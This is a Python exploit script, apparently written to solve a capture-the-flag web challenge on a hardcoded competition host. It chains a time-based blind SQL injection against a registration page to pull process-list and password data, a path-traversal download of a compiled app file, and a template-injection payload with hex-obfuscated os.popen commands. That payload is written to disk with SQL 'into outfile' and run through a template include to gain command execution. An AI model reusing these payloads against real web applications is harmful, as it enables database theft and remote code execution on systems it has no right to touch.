import sys
import re
import time
import requests
import random
import string as s1

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'}

def random_str(len):
    letters = s1.ascii_lowercase
    return ''.join(random.choice(letters) for x in range(len))

string = "qwertyuiopasdfghjklzxcvbnm1234567890/"
num = 1
def sql_exp(url):
    payload = ""
    try:
        for i in range(1,60):
            for j in string:
                payload1 = url+"/register.php?password=1&username=admin'%0dand%0dif(mid((select%0dInfo%0dfrom%0dinformation_schema.processlist%0dlimit%0d0,1)," + str(i) + ',1)%0din%0d(\'' + j + '\'),!sleep(3),1)%0dand%0d\'1'
                payload2 = url+"/register.php?password=1&username=admin'%0dand%0dif(mid((select%0dqwbqwbqwbpass%0dfrom%0dqwbtttaaab111e%0dlimit%0d0,1)," + str(i) + ',1)%0din%0d(\'' + j + '\'),!sleep(3),1)%0dand%0d\'1'
                time1 = time.time()
                #print(url)
                res = requests.get(payload1,headers=headers)
                #print(url+"/index.php?id=1'%0dand%0dif(mid((select%0dInfo%0dfrom%0dinformation_schema.processlist%0dlimit%0d0,1)," + str(i) + ',1)%0din%0d(\'' + j + '\'),sleep(1),0)%0dand%0d\'1')
                time2 = time.time()
                if 'error' in res.text:
                    print(1)
                #print(time2-time1)
                #print(res.text)
                intval1 = (time2 - time1)
                if intval1 > 3:
                    payload += j
                    print(payload)
                    continue
    except Exception as e:
            return False

    return True

## we111c000me_to_qwb


def download_file(url):
    payload = url+"/qwbimage.php?qwb_image_name=/qwb/app/__pycache__/app.cpython-35.pyc"
    s = requests.session()
    s.get(url+"/login.php?username=admin&password=we111c000me_to_qwb")
    res = s.get(payload)
    print(res.content)

def get_shell(url):
    file_name = random_str(6)
    register_payload = url+"/register.php?password=1&username=%7b%7b__import__(bytes.fromhex(str(hex(28531))[2:]).decode()).popen(bytes.fromhex(str(hex(159698592644438093083295786740770931105195540868394758120956263))[2:]).decode()).read()%7d%7d" #27763需要改，目前是ls
    requests.get(register_payload)
    upload_file_payload = url+"/register.php?password=1&username=1' or 1 into outfile '/var/lib/mysql-files/" + file_name
    requests.get(upload_file_payload)
    s = requests.session()
    s.get(url+"/login.php?username=admin&password=we111c000me_to_qwb")
    res = s.get(url+"/good_job_my_ctfer.php?congratulations={%25extends /var/lib/mysql-files/" + file_name + "%25}")
    print(res.text)


if __name__ == '__main__':
    #host=sys.argv[1]
    #port=sys.argv[2]
    host = "eci-2zeajgj31n7b8l35nf6g.cloudeci1.ichunqiu.com"
    port = 8888
    url = "http://"+host+":"+str(port)
    #sql_exp(url)
    #download_file(url)
    get_shell(url)
